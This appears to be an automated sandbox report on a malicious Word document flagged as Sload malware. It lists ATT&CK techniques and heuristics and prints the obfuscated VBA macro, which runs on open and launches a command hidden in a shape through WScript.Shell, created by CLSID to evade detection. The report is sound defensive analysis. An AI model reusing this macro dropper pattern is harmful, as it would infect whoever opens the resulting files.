MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1218.005 System Binary Proxy Execution: Mshta
T1566.001 Spearphishing Attachment
The sample contains VBA macros that trigger on AutoOpen, indicating a malicious document. Critical heuristics indicate the use of WScript.Shell to instantiate a dangerous COM class and a reference to PowerShell. The obfuscated VBA code likely attempts to download and execute a second-stage payload, possibly using mshta.exe as suggested by the reconstructed command.
Heuristics 9
-
ClamAV: Doc.Malware.Sload-6791731-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6791731-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Next Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Next Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8742 bytes |
SHA-256: da24bb15a60194cd66c5415a9e0e661d8a96b851fa45402824f8d4547a1e201d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
208 of 295 identifiers look randomly generated (e.g. 'osktKaFUXp') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "vhzBiAsI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case izViuOZ
Case 268899346
maoSU = CBool(FvEonQo)
XoMRQ = 334475000
Case 245552943
EalQcfoGw = Atn(ElwQYj)
icAjK = Atn(119083460 * CLng(36534801))
End Select
For Each vwphzIqZv In OhDzZHz
WLDEGPfJi = kKtHfWh * CDate(wYAIOMCu * zDlCsi) * vtqqrZ / Sin(naTok) / GChPsIZ + 276062484 - 94294734 + Chr(322851336) + (BLEjFzTsc * MlfrpYW)
Next
On Error Resume Next
Select Case YoNTpTtW
Case 104436401
uPFEIBCIR = CBool(jjAECaEnu)
wPFiKo = 226015111
Case 299598317
UoibiaKR = Atn(GWvvSZDr)
IRPPFbAB = Atn(202386975 * CLng(67058912))
End Select
For Each tTSIWwJ In EVisI
hYTBzj = TAZbXFiC * CDate(dvzurmD * YVQwmSiZ) * uYDhz / Sin(drZTtjzq) / CdsisNc + 308353349 - 140745332 + Chr(210210827) + (bQhhhvC * KKzudO)
Next
On Error Resume Next
Select Case CjtjpObWC
Case 341386355
lXHNK = CBool(rwjAP)
bNXwWjG = 85682922
Case 205692240
jRarkLJVl = Atn(mNjnDjJ)
FitzmLSTR = Atn(117835737 * CLng(34744277))
End Select
For Each wmavqpnTV In mLPllNik
nWPHBwjfO = RtrQvhz * CDate(nwNvqVZr * hAZEpjYS) * jfZwHK / Sin(tEmvvUE) / aqnfrjui + 64035469 - 94693720 + Chr(10399320) + (oVbNSzb * UNopC)
Next
On Error Resume Next
Select Case tHIItZ
Case 218004345
bpAZta = CBool(aLiGBW)
SKmYUdz = 66299889
Case 80709632
jlpHMNRl = Atn(zzNvBszwa)
omfvR = Atn(265656441 * CLng(327590924))
End Select
For Each UFDPRdN In HkENzRUGX
FOkjWhX = YzDqY * CDate(Prwjrj * khLkNsML) * RYXmjjl / Sin(iVsRFNmR) / lwGUoP + 260287876 - 336874450 + Chr(139337713) + (ZvJpKpBi * SljjGIwV)
Next
Set uYSTEzWV = Shapes("IHEZACs")
On Error Resume Next
Select Case NjFXKkiWC
Case 325245663
ijjJPh = CBool(GKzSIh)
hBXUGohOf = 82251888
Case 24770817
bnpLULRCi = Atn(czitKTju)
YXjcjGBwI = Atn(219142162 * CLng(100636164))
End Select
For Each UFZGZ In zdGqfM
ZZlMiOikR = RuKFFSO * CDate(VPjHs * nlChR) * isUjJjQk / Sin(TjUCaHL) / LtLrhJ + 320707644 - 103654818 + Chr(115368512) + (bYsLAScw * aiwYCii)
Next
On Error Resume Next
Select Case QKjVz
Case 43045712
HBAuhFnUm = CBool(BrnpHObVV)
jBzcIqZbq = 17823492
Case 87185052
CJMtiuw = Atn(VjPiCDpUJ)
EAbLTGCYm = Atn(280736370 * CLng(209717939))
End Select
For Each ijmXoi In NkhWYZz
UZEBESuz = CqpGrF * CDate(IRJFf * iOLrwKXdC) * WUhwhpbt / Sin(lZVzoWVi) / OHPsGcu + 274905225 - 275560770 + Chr(83049922) + (jajzETm * GZSpP)
Next
On Error Resume Next
Select Case kPHwU
Case 188777673
HAvSTjX = CBool(vjVQMiM)
VTcqJ = 4474450
Case 194759069
wAPHfwhz = Atn(KiXJkNm)
OaCGW = Atn(79778352 * CLng(160164887))
End Select
For Each JmcrlNG In OUTRPzz
WoBwowlFq = vabZbnrj * CDate(JFHqzbA * PtUoQaDki) * biMBXB / Sin(SjvosfZfb) / tOzDVoBVM + 140016978 - 331826834 + Chr(201885707) + (YotcPBJHi * rfuEF)
Next
osktKaFUXp = "" + FRBbX + GwBjXQsz + lHjBa + kkPVINC + uYSTEzWV.TextFrame.TextRange.Text + DMPZwV + MjvpDN + NTtvCL
On Error Resume Next
Select Case WlGaJQQU
Case 14565301
pQzVwIHI = CBool(vWZwkfnW)
HwpjDbVw = 137995964
Case 212908756
SbaMIIzwi = Atn(jrvwMNw)
VuWudNFw = Atn(60217634 * CLng(81824038))
End Select
For Each ACnbMPU In NnciqsObF
jrOYHzlZY = NGJwkbiWt * CDate(ihsQjA * LjBPlAEZV) * bvopn / Sin(WiGidwPOr) / pLCwzpGF + 169325134 - 295893508 + Chr(146527766) + (bFFZPUCb * ZvqWi)
Next
On Error Resume Next
Select Case cczLfVbJ
Case 176276797
cJutZFsES = CBool(fiGMAqjv)
GGQrvnk = 247390719
Case 201777419
GGAzwktz = Atn(qhdFhj)
tVlKo = Atn(251584830 * CLng(211695749))
End Select
For Each TpMSzGpT In XMfilH
HsRFvcB = IstOATrT * CDate(TdJXbwL * NQhVD) * INJDvUa / Sin(rodJGNaT) / fsEKIwEfu + 43565885 - 27666506 + Chr(222339585) + (TNEVlB * QvzzimUtR)
Next
On Error Resume Next
Select Case fHzdMGW
Case 8242733
tRjuli = CBool(tKwFtPoC)
AdrmqkpH = 181229746
Case 321342769
ihAzmc = Atn(zABJXFC)
iwjkPTwzM = Atn(189022450 * CLng(202135788))
End Select
For Each aIccTo In FLJBTQ
qCiqGlkwC = arhuikoUH * CDate(wpYYqi * zhYuNTXd) * SVWtidFiC / Sin(HWXaUhL) / vBdGA + 152156923 - 316802110 + Chr(257970484) + (iwMYJR * STzOjSjp)
Next
Set OXVvXFKL = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bSZGDN + QcbRM + zzrObkp + zFjIB)
On Error Resume Next
Select Case CElfaY
Case 62706517
CaRPXKYG = CBool(Jhjtd)
tzOwHF = 21487974
Case 92277803
wcvztY = Atn(bztaJnE)
vctXm = Atn(226330532 * CLng(228305583))
End Select
For Each YqriMa In dzMDQ
OaNhnGjzD = GsICf * CDate(fbfPIW * BqKAz) * bwjnLj / Sin(fqzbB) / UmkqDX + 149034467 - 117146679 + Chr(129961640) + (XAmrTLrc * ikcHX)
Next
Const ipSCmF = 0
On Error Resume Next
Select Case LZzww
Case 169309393
kimjfz = CBool(DGHzDZqt)
DaACsStw = 238053714
Case 209070610
jWGApIcPp = Atn(JhbTG)
dtiBRSut = Atn(146135219 * CLng(311932530))
End Select
For Each bRpqzAA In jAGHv
aDYutZimj = CFihOc * CDate(iulBwz * KhaLZj) * liEqOVz / Sin(Vopiant) / TtEncNK + 309255484 - 187528254 + Chr(26041690) + (kLwWM * sRWZqAGNB)
Next
On Error Resume Next
Select Case BfjhsItP
Case 201060592
YVUjLbB = CBool(muQfMlij)
YjADFbp = 257050929
Case 220102396
ilUZkNfSi = Atn(JmoaJFE)
WTwDIi = Atn(139072756 * CLng(234497440))
End Select
For Each VStfwdc In uSUjRhS
GTlrauAXV = OAbcpE * CDate(jJzpw * ILDOnj) * ElfICLjr / Sin(bSVJf) / bvRcPf + 229547790 - 161075755 + Chr(125047724) + (HFdfW * NoiLcVTa)
Next
On Error Resume Next
Select Case rVcHmVwLR
Case 165092232
uLpEivEJ = CBool(EOAbhMcA)
AZzjaHBtL = 327189517
Case 150085079
CThUzZpG = Atn(rufKqcVA)
ZtwTRzh = Atn(72769006 * CLng(249244612))
End Select
For Each CpjGnFBu In HimmuG
iTYki = slXdmjCh * CDate(onHDwIos * oiCtr) * GBMJUNmB / Sin(WwwiJ) / SslTuz + 205039892 - 278859205 + Chr(66489144) + (qaTvw * zukXlWt)
Next
On Error Resume Next
Select Case DjpozQb
Case 135559299
fzTwZPK = CBool(wWhWW)
abzATJwAG = 123948729
Case 250959929
uPbwvsO = Atn(hzpwfJ)
ZIsnw = Atn(219392154 * CLng(276894936))
End Select
For Each NzQHLi In rAKwUud
apIBJ = lDVKEXr * CDate(fntEzN * fkDqBGpmj) * JvFSzqfj / Sin(buuzGGnd) / WFQuPEv + 32917837 - 31400386 + Chr(75411343) + (XwQoW * cmuhzNXNm)
Next
On Error Resume Next
Select Case RfXPw
Case 331273846
clNNGdiE = CBool(ZkSWaP)
iVQRMCM = 5533935
Case 206096767
wLMaiaF = Atn(JAGJd)
kiqvqW = Atn(302174151 * CLng(227870935))
End Select
For Each Dotjj In ZZMijjT
luKNQROVZ = wjiMQKIcO * CDate(JlktY * jbtbtlRm) * BjJcQ / Sin(hPBizpNI) / ZHSKi + 2620546 - 67353657 + Chr(109089789) + (kimbzwNP * IPiwzzVbV)
Next
OXVvXFKL.Run# osktKaFUXp, ipSCmF
On Error Resume Next
Select Case jXVizq
Case 283743391
YUUXWNT = CBool(hipktz)
LQofBYn = 283266474
Case 299920648
lNObiG = Atn(bdoGA)
lFwHs = Atn(165923603 * CLng(142252333))
End Select
For Each VjwKNLL In BldbLkzF
zbjJPLTL = CaFQu * CDate(XhQdPQ * vzlbDdZ) * AFqXtzpUF / Sin(fwDIljk) / LDdUWpSij + 232538690 - 156906645 + Chr(261687065) + (plOBU * tBUiNK)
Next
On Error Resume Next
Select Case MtwwGaiM
Case 243799386
Ntjrk = CBool(hBBMbdsj)
Ddscij = 105893297
Case 74548497
MztjXZjEX = Atn(fBvIcSz)
jLMjBSdDw = Atn(248919421 * CLng(236078397))
End Select
For Each Zzhhf In mzicfWFX
SIVQK = ljzmcvb * CDate(TduVQ * hUNcpjBQG) * qdiQKvaV / Sin(bnQhuDr) / rKzlBo + 178358327 - 132519088 + Chr(334010902) + (tbdcVaUwz * KvYCYv)
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.